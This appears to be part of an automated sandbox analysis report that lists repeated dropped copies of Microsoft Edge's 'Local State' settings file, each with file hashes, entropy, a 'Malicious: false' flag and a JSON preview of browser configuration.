SHA1:	960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
SHA-256:	091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
SHA-512:	BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF52daf.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090767229766663
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
MD5:	71DDEA006A2FFF80ECAF157F5C2AFC1B
SHA1:	960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
SHA-256:	091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
SHA-512:	BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF52e0c.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090767229766663
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
MD5:	71DDEA006A2FFF80ECAF157F5C2AFC1B
SHA1:	960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
SHA-256:	091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
SHA-512:	BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF5b1c3.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090767229766663
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
MD5:	71DDEA006A2FFF80ECAF157F5C2AFC1B
SHA1:	960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
SHA-256:	091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
SHA-512:	BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF5b26f.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090767229766663
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
MD5:	71DDEA006A2FFF80ECAF157F5C2AFC1B
SHA1:	960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
SHA-256:	091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
SHA-512:	BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF5c490.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090767229766663
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
MD5:	71DDEA006A2FFF80ECAF157F5C2AFC1B
SHA1:	960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
SHA-256:	091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
SHA-512:	BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF5c4ed.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090767229766663
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
MD5:	71DDEA006A2FFF80ECAF157F5C2AFC1B
SHA1:	960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
SHA-256:	091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
SHA-512:	BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF5c57a.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090767229766663
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
MD5:	71DDEA006A2FFF80ECAF157F5C2AFC1B
SHA1:	960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
SHA-256:	091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
SHA-512:	BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF5d7c9.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090767229766663
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
MD5:	71DDEA006A2FFF80ECAF157F5C2AFC1B
SHA1:	960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
SHA-256:	091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
SHA-512:	BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF5d866.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090767229766663
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
MD5:	71DDEA006A2FFF80ECAF157F5C2AFC1B
SHA1:	960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
SHA-256:	091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
SHA-512:	BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF5eac5.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090767229766663
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
MD5:	71DDEA006A2FFF80ECAF157F5C2AFC1B
SHA1:	960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
SHA-256:	091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
SHA-512:	BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF5eb90.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090767229766663
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
MD5:	71DDEA006A2FFF80ECAF157F5C2AFC1B
SHA1:	960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
SHA-256:	091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
SHA-512:	BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
Malicious:	false
